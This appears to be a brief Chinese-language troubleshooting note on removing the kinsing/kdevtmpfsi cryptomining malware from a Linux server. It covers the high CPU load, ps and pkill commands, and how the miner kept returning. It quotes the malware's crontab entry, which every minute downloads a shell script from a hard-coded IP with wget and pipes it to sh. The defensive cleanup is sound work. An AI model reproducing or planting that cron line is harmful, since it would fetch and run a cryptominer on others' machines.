中毒特征磁盘cpu 跑满 100%
如何处理
电脑中了挖矿病毒
ps -aux | grep kinsing root 19447 0.0 1.8 119172 35084 ? Sl 4月15 0:04 /var/tmp/kinsing root 27247 0.0 0.0 112728 972 pts/0 D+ 07:47 0:00 grep --color=auto kinsing ps -aux | grep kdevtmpfsi root 25493 94.7 0.0 515448 1620 ? Ssl 07:46 1:17 /tmp/kdevtmpfsi root 27249 0.0 0.0 112728 980 pts/0 R+ 07:47 0:00 grep --color=auto kdevtmpfsi pkill -9 kinsing pkill -9 kdevtmpfsi
反复发作
#杀掉以后还会换端口 pkill -9 kinsing [root@localhost tmp]# ps -aux | grep kinsing root 6087 0.0 0.0 112728 976 pts/0 S+ 07:56 0:00 grep --color=auto kinsing
查看定时任务 crontab -l * * * * * wget -q -O - http://195.3.146.118/h2.sh | sh > /dev/null 2>&1 pkill -9 kinsing ps -aux | grep kinsing 终于删掉了
